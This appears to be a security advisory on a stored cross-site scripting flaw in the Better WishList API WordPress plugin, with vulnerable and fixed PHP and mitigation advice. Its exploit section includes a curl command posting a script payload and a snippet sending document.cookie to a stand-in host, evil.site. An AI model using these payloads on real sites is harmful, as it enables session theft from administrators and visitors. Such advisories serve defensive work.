CVE-2025-24641 is a newly discovered security vulnerability in the rickonline_nl Better WishList API plugin for WordPress. This issue allows attackers to execute stored cross-site scripting (XSS) attacks, potentially letting them steal session cookies, deface web pages, or perform magic behind the scenes using injected JavaScript code.
Below, we’ll break down how this vulnerability works, how to reproduce it, and ways to stay protected, using plain language for developers, admins, and anyone running a vulnerable website.
Type: Stored XSS (Improper Neutralization of Input)
- Plugin: Better WishList API
Fixed in: Not fixed yet (as of this writing)
- Exploitable by: Any user able to submit or store data via the plugin’s API, whether unauthenticated or with minimal permissions.
- Danger: An attacker can save malicious JavaScript in a WishList item, which runs for every future visitor/admin viewing stored wishlists.
Where is the Problem?
The bug happens when the plugin doesn’t filter or escape user-provided data before saving it to the database and then displaying it on the website. Things like wishlist item names, descriptions, or user notes are effected.
Here’s a simplified PHP snippet showing a risky function (for illustration)
// BAD example: user-supplied data from $_POST saved directly
function bwishlist_add_item() {
$title = $_POST['title']; // BAD: no sanitization
$description = $_POST['description'];
$user_id = get_current_user_id();
// Save to DB
$wishlist_item = array(
'post_title' => $title,
'post_content' => $description,
'post_type' => 'wishlist_item',
'post_author' => $user_id,
);
wp_insert_post($wishlist_item); // Unescaped write
}
Later, that content is output directly in admin or public views, unsanitized, like
// BAD
echo $wishlist_item->post_title;
echo $wishlist_item->post_content;
How Can Someone Attack It? (Exploit Steps)
1. Attacker submits a crafted malicious payload (example: <script>alert("Hacked")</script>) for a WishList item, using the API endpoint or web form.
The plugin saves this data to the database.
3. When anyone (including admins) visits the page where this WishList item is listed, the malicious script executes in their browser context.
Here’s a curl example to submit a payload
curl -X POST https://victim.site/wp-json/betterwishlist/v1/item \
-d 'title=<script>fetch("https://evil.site/?cookies="+document.cookie)</script>' \
-d 'description=Nice Gift!' \
-H 'Content-Type: application/x-www-form-urlencoded'
When a site administrator or user views their wishlist, it will run the attacker’s JavaScript! For example, it might steal cookies:
<script>
fetch('https://evil.site/log?cookie='; + document.cookie);
</script>
Original References
- WordPress Plugin Page: Better WishList
- NVD Entry: CVE-2025-24641 (Pending)
What’s the Impact?
- Users at risk: Every visitor who loads the wishlist data—admins especially, since they have higher privileges.
If You’re a Developer
1. Sanitize all input: Use sanitize_text_field(), esc_html(), or similar functions before saving/displaying data in WordPress.
Fixed code example
function bwishlist_add_item() {
$title = sanitize_text_field($_POST['title']);
$description = sanitize_textarea_field($_POST['description']);
$user_id = get_current_user_id();
$wishlist_item = array(
'post_title' => $title,
'post_content' => $description,
'post_type' => 'wishlist_item',
'post_author' => $user_id,
);
wp_insert_post($wishlist_item); // Now safe
}
echo esc_html($wishlist_item->post_title);
echo esc_html($wishlist_item->post_content);
If You’re a Site Admin
- Update the plugin: Check for a patched version regularly. If none is available, consider disabling or removing Better WishList API.
Monitor user submissions: Watch for suspicious items with <script>, onerror=, etc.
- Apply a web application firewall (WAF): Services like Cloudflare WAF can catch basic XSS attacks before they hit your server.
Patch or disable the plugin until it's safe and up-to-date.
Stay safe and watch for updates from the plugin authors.
Found this helpful? Share with anyone who uses WordPress and could be at risk!
*This article is original content. Please credit/link if you share snippets or summaries.*
Timeline
Published on: 02/14/2025 13:15:49 UTC